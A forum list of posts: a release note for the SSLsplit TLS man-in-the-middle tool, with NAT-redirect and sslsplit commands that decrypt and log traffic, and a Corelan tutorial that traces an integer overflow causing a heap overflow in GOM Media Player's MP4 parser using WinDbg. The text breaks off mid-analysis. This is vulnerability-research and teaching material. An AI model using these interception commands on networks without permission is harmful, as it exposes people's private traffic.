Everything posted by Nytro
-
SSLsplit 0.4.7

Site: roe.ch

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

Changes: This release prevents IETF draft public key pinning by removing HPKP headers from responses. Also, remaining threading issues in daemon mode are fixed, and the connection log now contains the HTTP status code and the size of the response.

Download: http://packetstormsecurity.com/files/download/122283/sslsplit-0.4.7.tar.bz2

Source: SSLsplit 0.4.7 ≈ Packet Storm
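For context on the "transparently intercepted" part, a typical setup with SSLsplit's Linux NAT engine looks roughly like the sketch below. The port, file names and CA paths are illustrative assumptions; consult the SSLsplit documentation for your platform's NAT engine.

# Redirect outbound HTTPS to SSLsplit's listener via the NAT engine
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

# Terminate TLS with a local CA, re-encrypt to the real destination, log connections and content
sslsplit -k ca.key -c ca.crt -l connections.log -L content.log ssl 0.0.0.0 8443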
-
[h=2]Root Cause Analysis – Integer Overflows[/h]

Published July 2, 2013 | By Corelan Team (Jason Kratzer)

Table of Contents

- Foreword
- Introduction
- Analyzing the Crash Data
- Identifying the Cause of Exception (Page heap, Initial analysis)
- Reversing the Faulty Function
- Determining Exploitability (Challenges, Prerequisites)
- Heap Basics (Lookaside Lists, Freelists)
- Preventative Security Measures (Safe-Unlinking, Heap Cookies)
- Application Specific Exploitation (Thoughts on This Attack)
- Generic Exploitation Methods
- Lookaside List Overwrite (Overview, Application Specific Technique, Why Not?)
- Brett Moore: Wrecking Freelist[0] Since 2005
- Freelist[0] Insert Attack (Overview, Application Specific Technique, Why Not?)
- Freelist[0] Searching Attack (Overview, Application Specific Technique, Why Not?)
- Conclusion
- Recommended Reading

[h=3]Foreword[/h]

Over the past few years, Corelan Team has received many exploit related questions, including "I have found a bug and I don't seem to control EIP, what can I do?", "Can you write a tutorial on heap overflows?" or "What are integer overflows?". In this article, Corelan Team member Jason Kratzer (pyoor) tries to answer some of these questions in a very practical, hands-on way. He went to great lengths to illustrate the entire process: finding a bug, taking the crash information and reverse engineering the crash context to identify the root cause of the bug, and finally discussing multiple ways to exploit the bug. Of course, most – if not all – of the techniques in this document were discovered many years ago, but I'm sure this is one of the first (public) articles that shows you how to use them in a real life scenario, with a real application. Although the techniques mostly apply to Windows XP, we believe it is required knowledge, necessary before looking at newer versions of the Windows operating system and defeating modern mitigation techniques. Enjoy! - corelanc0d3r

[h=3]Introduction[/h]

In my previous article, we discussed the process used to evaluate a memory corruption bug that I had identified in a recently patched version of KMPlayer. With the crash information generated by this bug we were able to step through the crash, identify the root cause of our exception, and determine exploitability. In doing so, we were able to identify 3 individual methods that could potentially be used for exploitation. This article will serve as a continuation of the series, with the intention of building upon some of the skills we discussed during the previous "Root Cause Analysis" article. If you have not done so already, I highly recommend reviewing the contents of that article (located here) before proceeding. For the purpose of this article, we'll be analyzing an integer overflow that I had identified in the GOM Media Player software developed by GOM Labs. This bug affects GOM Media Player 2.1.43 and was reported to the GOM Labs development team on November 19, 2012. A patch was released to mitigate this issue on December 12, 2012. As with our previous bug, I had identified this vulnerability by fuzzing the MP4/QT file formats using the Peach Framework (v2.3.9). In order to reproduce this issue, I have provided a bare bones fuzzing template (Peach PIT) which specifically targets the vulnerable portion of the MP4/QT file format. You can find a copy of that Peach PIT here. The vulnerable version of GOM Player can be found here.
[h=3]Analyzing the Crash Data[/h]

Let's begin by taking a look at the file, LocalAgent_StackTrace.txt, which was generated by Peach at crash time. I've included the relevant portions below:

(cdc.5f8): Access violation - code c0000005 (first chance)
r
eax=00000028 ebx=0000004c ecx=0655bf60 edx=00004f44 esi=06557fb4 edi=06555fb8
eip=063b4989 esp=0012bdb4 ebp=06557f00 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
GSFU!DllUnregisterServer+0x236a9:
063b4989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0655c000=????????
kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012bdc0 063b65eb 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x236a9
0012bdd8 063b8605 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x2530b
0012be00 063b8a85 064dcda8 0652afb8 0652afb8 GSFU!DllUnregisterServer+0x27325
0012be18 063b65eb 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x277a5
0012be30 063b8605 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x2530b
0012be58 063b8a85 064dcda8 06510fb8 06510fb8 GSFU!DllUnregisterServer+0x27325
0012be70 063b65eb 064dcda8 06510fb8 06500fb8 GSFU!DllUnregisterServer+0x277a5
<...truncated...>
INSTRUCTION_ADDRESS:0x00000000063b4989
INVOKING_STACK_FRAME:0
DESCRIPTION:User Mode Write AV
SHORT_DESCRIPTION:WriteAV
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - User Mode Write AV starting at GSFU!DllUnregisterServer+0x00000000000236a9 (Hash=0x1f1d1443.0x00000000)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.

(You can download the complete Peach crash data here)

As we can see here, we've triggered a write access violation by attempting to write the value of edx to the location pointed at by [ecx+eax*4]. This instruction fails, of course, because the location [ecx+eax*4] points to an inaccessible region of memory (0655c000=????????). Since we do not have symbols for this application, the stack trace does not provide us with any immediately evident clues as to the cause of our exception. Furthermore, we can also see that !exploitable has made the assumption that this crash is exploitable due to the fact that the faulting instruction attempts to write data to an out of bounds location and that location is not near null. It makes this distinction because a location that is near null may be indicative of a null pointer dereference, and these types of bugs are typically not exploitable (though not always). Let's try and determine if !exploitable is, in fact, correct in this assumption.

[h=3]Identifying the Cause of Exception[/h]

[h=4]Page heap[/h]

Before we begin, there's something very important that we must discuss. Take a look at the bare bones Peach PIT I've provided; particularly the Agent configuration beginning at line 55.

<Agent name="LocalAgent">
  <Monitor class="debugger.WindowsDebugEngine">
    <Param name="CommandLine" value="C:\Program Files\GRETECH\GomPlayer\GOM.EXE &quot;C:\fuzzed.mov&quot;" />
    <Param name="StartOnCall" value="GOM.EXE" />
  </Monitor>
  <Monitor class="process.PageHeap">
    <Param name="Executable" value="GOM.EXE"/>
  </Monitor>
</Agent>

Using this configuration, I've defined the primary monitor as the "WindowsDebugEngine", which uses PyDbgEng, a wrapper for the WinDbg engine dbgeng.dll, in order to monitor the process. This is typical of most Peach fuzzer configurations under Windows. However, what's important to note here is the second monitor, "process.PageHeap".
This monitor enables full page heap verification by using the Microsoft debugging tool, GFlags (Global Flags Editor). In short, GFlags is a utility that is packaged with the Windows SDK, and enables users to more easily troubleshoot potential memory corruption issues. There are a number of configuration options available with GFlags. For the purpose of this article, we'll only be discussing two: standard and full page heap verification.

When using page heap verification, a special page header prefixes each heap chunk. The image below displays the structure of a standard (allocated) heap chunk and the structure of an (allocated) heap chunk with page heap enabled. This information can also be extracted by using the following display type ('dt') commands:

# Displays the standard heap metadata. Replace 0xADDRESS with the heap chunk start address
dt _HEAP_ENTRY 0xADDRESS
# Displays the page heap metadata. Replace 0xADDRESS with the start stamp address.
dt _DPH_BLOCK_INFORMATION 0xADDRESS

One of the most important additions to the page heap header is the "user stack traces" (+ust) field. This field contains a pointer to the stack trace of our allocated chunk. This means that we're now able to enumerate which functions eventually lead to the allocation or free of the heap chunk in question. This is incredibly useful when trying to track down the root cause of our exception. Both standard and full heap verification prefix each chunk with this header.

The primary difference between standard and full page heap verification is that under standard heap verification, fill patterns are placed at the end of each heap chunk (0xa0a0a0a0). If, for instance, a buffer overflow were to occur and data was written beyond the boundary of the heap chunk, the fill pattern located at the end of the chunk would be overwritten and therefore corrupted. When our now corrupt block is accessed by the heap manager, the heap manager will detect that the fill pattern has been modified/corrupted and cause an access violation to occur. With full page heap verification enabled, rather than appending a fill pattern, each heap chunk is placed at the end of a (small) page. This page is followed by another (small) page that has the PAGE_NOACCESS access level set. Therefore, as soon as we attempt to write past the end of the heap chunk, an access violation will be triggered directly (in comparison with having to wait for a call to the heap manager). Of course, the use of full page heap will drastically change the heap layout, because every heap allocation will trigger the creation of a new page. In fact, the application may even run out of heap memory space if it is performing a lot of allocations. For a full explanation of GFlags, please take a look at the MSDN documentation here.

Now the reason I've brought this up is that in order to replicate the exact crash generated by Peach, we'll need to enable GFlags for the GOM.exe process. GFlags is part of the Windows Debugging Tools package, which is now included in the Windows SDK. The Windows 7 SDK, which is recommended for both Windows XP and 7, can be found here. In order to enable full page heap verification for the GOM.exe process, we'll need to execute the following command:

C:\Program Files\Debugging Tools for Windows (x86)>gflags /p /enable GOM.exe /full

[h=4]Initial analysis[/h]

With that said, let's begin by comparing our original seed file and mutated file using the 010 Binary Editor.
Please note that in the screenshot below, "Address A" and "Address B" correlate with OriginalSeed.mov and MutatedSeed.mov respectively. Here we can see that our fuzzer applied 8 different mutations and removed 1 block element entirely (as identified by our change located at offset 0x12BE). As documented in the previous article, you should begin by reverting each change, 1 element at a time, from their mutated values to those found in the original seed file. After each change, save the updated sample and open it up in GOM Media Player while monitoring the application using WinDbg.

windbg.exe "C:\Program Files\GRETECH\GomPlayer\GOM.EXE" "C:\Path-To\MutatedSeed.mov"

The purpose here is to identify the minimum number of mutated bytes required to trigger our exception. Rather than documenting each step of the process which we had already outlined in the previous article, we'll simply jump forward to the end result. Your minimized sample file should now look like the following:

Here we can see that a single, 4 byte change located at file offset 0x131F was responsible for triggering our crash. In order to identify the purpose of these bytes, we must identify what atom or container they belong to. Just prior to our mutated bytes, we can see the ASCII string "stsz". This is known as a FourCC. The QuickTime and MPEG-4 file formats rely on these FourCC strings in order to identify various atoms or containers used within the file format. Knowing that, we can look up the structure of the "stsz" atom in the QuickTime File Format Specification found here.

Size: 0x00000100
Type: 0x7374737A (ASCII stsz)
Version: 0x00
Flags: 0x000000
Sample Size: 0x00000000
Number of Entries: 0x80000027
Sample Size Table(1): 0x000094B5
Sample Size Table(2): 0x000052D4

Looking at the layout of the "stsz" atom, we can see that the value for the "Number of Entries" element has been replaced with a significantly larger value (0x80000027, compared with the original value of 0x3B). Now that we've identified the minimum change required to trigger our exception, let's take a look at the faulting block (GSFU!DllUnregisterServer+0x236a9) in IDA Pro.

[h=3]Reversing the Faulty Function[/h]

Without any state information, such as register values or memory locations used during run time, we can only make minor assumptions based on the instructions contained within this block. However, armed with only this information, let's see what we can come up with. Let's assume that eax and edx are set to 0x00000000 and that esi points to the byte sequence AA BB CC DD:

- A single byte is moved from the location pointed at by esi to edx, resulting in edx == 0x000000AA
- A single byte is moved from the location pointed at by [esi+1] to ecx
- edx is shifted left by 8 bits, resulting in 0x0000AA00
- ecx is added to edx, resulting in 0x0000AABB
- A single byte is moved from the location pointed at by [esi+2] to ecx
- edx is again shifted left by 8 bits, resulting in 0x00AABB00
- ecx is again added to edx, resulting in 0x00AABBCC
- A single byte is moved from the location pointed at by [esi+3] to ecx
- edx is again shifted left by 8 bits, resulting in 0xAABBCC00
- And finally, ecx is added to edx, resulting in 0xAABBCCDD

So what does this all mean? Well, our first 10 instructions appear to be an overly complex version of the following instruction:

mov edx, dword ptr [esi]

However, upon closer inspection, what we actually see is that due to the way bytes are stored in memory (x86 is little-endian), this sequence is actually responsible for reversing the byte order of the input string.
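In C terms, the sequence is simply a big-endian 32-bit read. A minimal sketch of the same logic follows (the helper name is mine, not something taken from the GSFU binary):

#include <stdint.h>

/* Rough C equivalent of the ten-instruction sequence above: combine
   four bytes most-significant-first. On a little-endian x86 this is a
   byte-swapped (big-endian) read, which is exactly what big-endian
   MP4/QT atom fields require. */
static uint32_t read_be32(const uint8_t *p)
{
    uint32_t value = p[0];           /* first byte into the low bits    */
    value = (value << 8) | p[1];     /* shl 8, add the next byte        */
    value = (value << 8) | p[2];
    value = (value << 8) | p[3];
    return value;                    /* bytes AA BB CC DD -> 0xAABBCCDD */
}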
So our initial read value of 0x41424344 (ABCD) will be written as 0x44434241 (DCBA). With that said, let's reduce our block down to:

loc_3B04960:
cmp ebx, 4
jl short loc_3B0499D   ; Jump outside of our block
movzx edx, dword ptr [esi] ; Writes reverse byte order ([::-1])
mov ecx, [edi+28h]
mov ecx, [ecx+10h]
mov [ecx+eax*4], edx   ; Exception occurs here.
                       ; Write @edx to [ecx+eax*4]
mov edx, [edi+28h]
mov ecx, [edx+0Ch]
add esi, 4
sub ebx, 4
inc eax
cmp eax, ecx
jb short loc_3B04960

Now before we actually observe our block in the debugger, there are still a few more characteristics we can enumerate:

- The value pointed to by esi is moved to edx
- edx is then written to [ecx+eax*4]
- The value of esi is increased by 4
- The value of ebx is decreased by 4
- eax is incremented by 1
- The value of eax is compared against ecx. If eax is equal to ecx, exit the block. Otherwise, jump to our first instruction.
- Once at the beginning of our block, ebx is then compared against 0x4. If ebx is less than 4, exit the block. Otherwise, perform our loop again.

To summarize, our first instruction attempts to determine if ebx is less than or equal to 4. If it is not, we begin our loop by moving a 32 bit value at memory location "A" and writing it to memory location "B". Then we check to make sure eax is not equal to ecx. If it isn't, then we return to the beginning of our loop. This process will continue, performing a block move of our data, until one of our 2 conditions is met. With a rough understanding of the instruction set, let's observe its behavior in our debugger. We'll set the following breakpoints, which will halt execution if either of our conditions causes our block iteration to exit, and inform us of what data is being written and to where.

r @$t0 = 1
bp GSFU!DllUnregisterServer+0x23680 ".printf \"Block iteration #%p\\n\", @$t0; r @$t0 = @$t0 + 1; .if (@ebx <= 0x4) {.printf \"1st condition is true. Exiting block iteration\\n\"; } .else {.printf \"1st condition is false (@ebx == 0x%p). Performing iteration\\n\", @ebx; gc}"
bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4); gc"
bp GSFU!DllUnregisterServer+0x236b9 ".if (@eax == @ecx) {.printf \"2nd is false. Exiting block iteration.\\n\\n\"; } .else {.printf \"2nd condition is true. ((@eax == 0x%p) <= (@ecx == 0x%p)). Performing iteration\\n\\n\", @eax, @ecx; gc}"

With our breakpoints set, you should see something similar to the following:

Block iteration #00000001
1st condition is false (@ebx == 0x000000ec). Performing iteration
The value, 0x000094b5, is taken from 0x07009f14 and written to 0x0700df60
2nd condition is true. ((@eax == 0x00000001) <= (@ecx == 0x80000027)). Performing iteration

Block iteration #00000002
1st condition is false (@ebx == 0x000000e8). Performing iteration
The value, 0x000052d4, is taken from 0x07009f18 and written to 0x0700df64
2nd condition is true. ((@eax == 0x00000002) <= (@ecx == 0x80000027)). Performing iteration

...truncated...

Block iteration #00000028
1st condition is false (@ebx == 0x00000050). Performing iteration
The value, 0x00004fac, is taken from 0x07009fb0 and written to 0x0700dffc
2nd condition is true. ((@eax == 0x00000028) <= (@ecx == 0x80000027)). Performing iteration

Block iteration #00000029
1st condition is false (@ebx == 0x0000004c). Performing iteration
The value, 0x00004f44, is taken from 0x07009fb4 and written to 0x0700e000
(1974.1908): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling. This exception may be expected and handled.
eax=00000028 ebx=0000004c ecx=0700df60 edx=00004f44 esi=07009fb4 edi=07007fb8
eip=06e64989 esp=0012bdb4 ebp=07009f00 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
GSFU!DllUnregisterServer+0x236a9:
06e64989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0700e000=????????

Here we can see that neither of our conditions caused our block iteration to exit. Our instruction block performed 0x29 writes until a memory boundary was reached (likely caused by our full page heap verification), which triggers an access violation. Using the 'db' command, let's take a look at the data we've written.

0:000> db 0x0700df60
0700df60 b5 94 00 00 d4 52 00 00-a8 52 00 00 2c 52 00 00 .....R...R..,R..
0700df70 7c 52 00 00 80 52 00 00-a4 52 00 00 28 53 00 00 |R...R...R..(S..
0700df80 18 53 00 00 94 52 00 00-20 53 00 00 ac 52 00 00 .S...R.. S...R..
0700df90 28 53 00 00 e0 51 00 00-d0 52 00 00 88 52 00 00 (S...Q...R...R..
0700dfa0 e0 52 00 00 94 52 00 00-18 53 00 00 14 52 00 00 .R...R...S...R..
0700dfb0 14 52 00 00 5c 52 00 00-34 52 00 00 08 52 00 00 .R..\R..4R...R..
0700dfc0 d4 51 00 00 84 51 00 00-d8 51 00 00 d8 50 00 00 .Q...Q...Q...P..
0700dfd0 3c 51 00 00 04 52 00 00-a4 51 00 00 bc 50 00 00 <Q...R...Q...P..

Now let's break down the information returned by our breakpoints. First, taking a look at our write instructions, we can see that the data being written appears to be the contents of our "Sample Size Table". Our vulnerable block is responsible for reading 32 bits during each iteration from a region of memory beginning at 0x07009F14 and writing it to a region beginning at 0x0700DF60 (these addresses may be different for you and will likely change after each execution). This is a good sign, as it means that we can control what data is being written. Furthermore, we can see that during our second condition, eax is being compared against the same value provided as the "Number of Entries" element within our "stsz" atom. This means that we can control at least 1 of the 2 conditions which determine how many times our write instruction occurs. This is good. As with our previous example (KMPlayer), we demonstrated that if we can write beyond the intended boundary of our function, we may be able to overwrite sensitive data. As for our first condition, it's not yet apparent where the value stored in ebx is derived. More on this in a bit.

At this point, things are looking pretty good. So far we've determined that we can control the data we write and at least one of our conditions. However, we still haven't figured out why we're writing beyond our boundary and into the guard page. In order to determine this, we'll need to enumerate some information regarding the region where our data is being written, such as the size and type (whether it be stack, heap, or virtually allocated memory). To do so, we can use corelanc0d3r's mona extension for WinDbg. Before we do, however, we'll need to modify GFlags to only enable standard page heap verification. The reason for this is that when using full page heap verification, GFlags will modify our memory layout in a way that will not accurately reflect our memory state when run without GFlags.
To enable standard page heap verification, we'll execute the following command:

gflags.exe /p /enable gom.exe

Next, let's go ahead and start our process under WinDbg. This time, we'll only apply 1 breakpoint in order to halt execution upon our first write instruction.

0:000> bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4)"
Bp expression 'GSFU!DllUnregisterServer+0x236a9' could not be resolved, adding deferred bp
0:000> g
The value, 0x000094b5, is taken from 0x06209c4c and written to 0x06209dc0
eax=00000000 ebx=000000ec ecx=06209dc0 edx=000094b5 esi=06209c4c edi=06209bb8
eip=06034989 esp=0012bdb4 ebp=06209c38 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
GSFU!DllUnregisterServer+0x236a9:
06034989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:06209dc0=00000000
0:000> !py mona info -a 0x06209dc0
Hold on...
[+] Generating module info table, hang on... - Processing modules - Done. Let's rock 'n roll.
[+] NtGlobalFlag: 0x02000000
    0x02000000 : +hpa - Enable Page Heap
[+] Information about address 0x06209dc0 {PAGE_READWRITE}
    Address is part of page 0x06200000 - 0x0620a000
    This address resides in the heap
    Address 0x06209dc0 found in _HEAP @ 06200000, Segment @ 06200680
    HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state
    06209d98 000000d8 00000050 00000014 [03] 06209dc0 000000a4 0000000c Extra present,Busy (hex)
    00000216 00000080 00000020 00000164 00000012 Extra present,Busy (dec)
    Chunk header size: 0x8 (8)
    Extra header due to GFlags: 0x20 (32) bytes
    DPH_BLOCK_INFORMATION Header size: 0x20 (32)
      StartStamp    : 0xabcdaaaa
      Heap          : 0x86101000
      RequestedSize : 0x0000009c
      ActualSize    : 0x000000c4
      TraceIndex    : 0x0000193e
      StackTrace    : 0x04e32364
      EndStamp      : 0xdcbaaaaa
    Size initial allocation request: 0xa4 (164)
    Total space for data: 0xb0 (176)
    Delta between initial size and total space for data: 0xc (12)
    Data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...
[+] Disassembly: Instruction at 06209dc0 : ADD BYTE PTR [EAX],AL
Output of !address 0x06209dc0:
    Usage: <unclassified>
    Allocation Base: 06200000
    Base Address: 06200000
    End Address: 0620a000
    Region Size: 0000a000
    Type: 00020000.MEM_PRIVATE
    State: 00001000.MEM_COMMIT
    Protect: 00000004.PAGE_READWRITE

Good. So here we can see that we're writing to an allocated heap chunk. The requested size of our block is 0x9C. Based on our access violation, we can already determine that the current state of our mutated file will attempt to write more than 0x9C bytes of data. After 0x9C bytes, our boundary is reached and an access violation is triggered. Considering the structure in which we're writing our data, it appears as if we've identified a very simple example of a heap overflow. If we are able to control the length of the data being written and another heap chunk sits in a location following our written data, we may be able to write beyond the bounds of our chunk and corrupt the metadata (chunk header) of the following chunk, or application data stored in that adjacent chunk (that is, of course, with GFlags disabled). More on this later. However, before we attempt to do so, we still have not determined the actual cause of our exception. Why is it that we are allocating a region that is only 0x9C bytes, yet attempting to write significantly more? Our next step in the process will be to determine where our allocated size of 0x9C comes from.
Is this some value specified in the file? There are in fact several methods we could use to determine this. We could set a breakpoint on all heap allocations of size 0x9C. Once we've identified the appropriate allocation, we can then look into the calling function in order to determine where the size is derived. Fortunately for us, with GFlags enabled, that is unnecessary. As I mentioned earlier, when page heap verification is enabled, a field within the page heap header contains a pointer to the stack trace of our allocated block. A pointer to this stack trace is listed in !mona's output under the DPH_BLOCK_INFORMATION table (highlighted above). This allows us to see which functions were called just prior to our allocation. This information can also be obtained without !mona by using the !heap command while supplying an address within the heap chunk:

!heap -p -a 0x06209dc0

You can also retrieve this information using the 'dt' command and the address of the chunk's "StartStamp":

dt _DPH_BLOCK_INFORMATION 0x06209da0

With that said, let's use the 'dds' command to display the stack trace of the allocated chunk.

0:000> dds 0x04e32364
04e32364 abcdaaaa
04e32368 00000001
04e3236c 00000004
04e32370 00000001
04e32374 0000009c
04e32378 06101000
04e3237c 04fbeef8
04e32380 04e32384
04e32384 7c94b244 ntdll!RtlAllocateHeapSlowly+0x44
04e32388 7c919c0c ntdll!RtlAllocateHeap+0xe64
04e3238c 0609c2af GSFU!DllGetClassObject+0x29f8f
04e32390 06034941 GSFU!DllUnregisterServer+0x23661

Here we can see two GOM functions (GSFU!DllUnregisterServer and GSFU!DllGetClassObject) are called prior to the allocation. First, let's take a quick glance at the function just prior to our call to ntdll!RtlAllocateHeap using IDA Pro. So, as we would expect, here we can see a call to HeapAlloc. The value being provided as dwBytes would be 0x9C (our requested size). It's important to note here that IDA Pro, unlike WinDbg, has the ability to enumerate functions such as this. When it identifies a call to a known function, it will automatically apply comments in order to identify known variables supplied to that function. In the case of HeapAlloc (ntdll!RtlAllocateHeap), it accepts 3 arguments: dwBytes (size of the allocation), dwFlags, and hHeap (a pointer to the owning heap). More information on this function can be found at the MSDN page here.

Now, in order to identify where the value of dwBytes is introduced, let's go ahead and take a quick look at the previous function (GSFU!DllUnregisterServer+0x23661) in our stack trace. Interesting. Here we can see that a call to the Calloc function is made, which in turn calls HeapAlloc. Before we continue, we need to have a short discussion about Calloc. Calloc is a function used to allocate a contiguous block of memory for an array. It accepts two arguments:

size_t num  ; Number of Objects
size_t size ; Size of Objects

It will allocate a region of memory using a size derived by multiplying both arguments (Number of Objects * Size of Objects). Then, by calling memset, it will zero-initialize the array (not really important for the purpose of this article). What is important to note, however, is that rather than using the CRT version of Calloc (msvcrt!calloc), an internal implementation is used. We can see this by following the call (the code is included in the GSFU module rather than making an external call to msvcrt). The importance of this will become clear very soon. You can easily follow any call in IDA Pro by simply clicking on the called function.
In this case, clicking on "_calloc" will bring us to our inlined function. We can determine that the function has been inlined as GSFU.ax is our only loaded module. A jump to the msvcrt!calloc function would be displayed by an "extrn", or external, data reference (DREF). Now, with a quick look at our two calling functions, let's go ahead and set a one-time breakpoint on the first value being supplied to Calloc so that once it is hit, another breakpoint is applied to ntdll!RtlAllocateHeap. Then, we'll trace until ntdll!RtlAllocateHeap is hit. Let's go ahead and apply the following breakpoint, and then tell the process to continue running (g).

0:000> bp GSFU!DllUnregisterServer+0x23653 /1 "bp ntdll!RtlAllocateHeap; ta"
Bp expression 'GSFU!DllUnregisterServer+0x23653 /1' could not be resolved, adding deferred bp
0:000> g
eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8
eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286
GSFU!DllUnregisterServer+0x23653
06034933 52 push edx ; Number of Elements
eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8
eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286
GSFU!DllUnregisterServer+0x23654:
06034934 6a04 push 4 ; Size of Elements
eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8
eip=06034936 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286
GSFU!DllUnregisterServer+0x23656:
06034936 83c604 add esi,4
eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8
eip=06034939 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
GSFU!DllUnregisterServer+0x23659:
06034939 83eb0c sub ebx,0Ch
eax=050d9d70 ebx=000000ec ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8
eip=0603493c esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
GSFU!DllUnregisterServer+0x2365c:
0603493c e8e6780600 call GSFU!DllGetClassObject+0x29f07 (0609c227) ; Calloc

...truncated...

eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8
eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
GSFU!DllGetClassObject+0x29f16:
05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=050d9bb8
eip=05d5c23a esp=0012bd78 ebp=0012bda4 iopl=0 ov up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200a07
GSFU!DllGetClassObject+0x29f1a:
05d5c23a 8975e0 mov dword ptr [ebp-20h],esi ss:0023:0012bd84=0012d690

...truncated...
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a0 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
GSFU!DllGetClassObject+0x29f80:
05d5c2a0 56 push esi ; Allocation Size
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a1 esp=0012bd74 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
GSFU!DllGetClassObject+0x29f81:
05d5c2a1 6a08 push 8 ; Flags
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a3 esp=0012bd70 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
GSFU!DllGetClassObject+0x29f83:
05d5c2a3 ff35a0cada05 push dword ptr [GSFU!DllGetClassObject+0x7a780 (05dacaa0)] ds:0023:05dacaa0=05dc0000 ; HeapHandle
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a9 esp=0012bd6c ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
GSFU!DllGetClassObject+0x29f89:
05d5c2a9 ff15ece0d605 call dword ptr [GSFU!DllGetClassObject+0x3bdcc (05d6e0ec)] ds:0023:05d6e0ec={ntdll!RtlAllocateHeap (7c9100c4)}
Breakpoint 1 hit
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=7c9100c4 esp=0012bd68 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
ntdll!RtlAllocateHeap:
7c9100c4 6804020000 push 204h

When analyzing operations like this, I typically find it best to start from the bottom up. Since we already know that our requested allocation size is 0x9C, we can begin at the point where the value 0x9C is provided as the dwBytes argument for ntdll!RtlAllocateHeap (GSFU!DllGetClassObject+0x29f80). The next thing we need to do is look for the instruction, prior to our push instruction, that either introduces the value 0x9C to esi or modifies it. Looking back a few lines, we see this instruction:

eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8
eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
GSFU!DllGetClassObject+0x29f16:
05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027

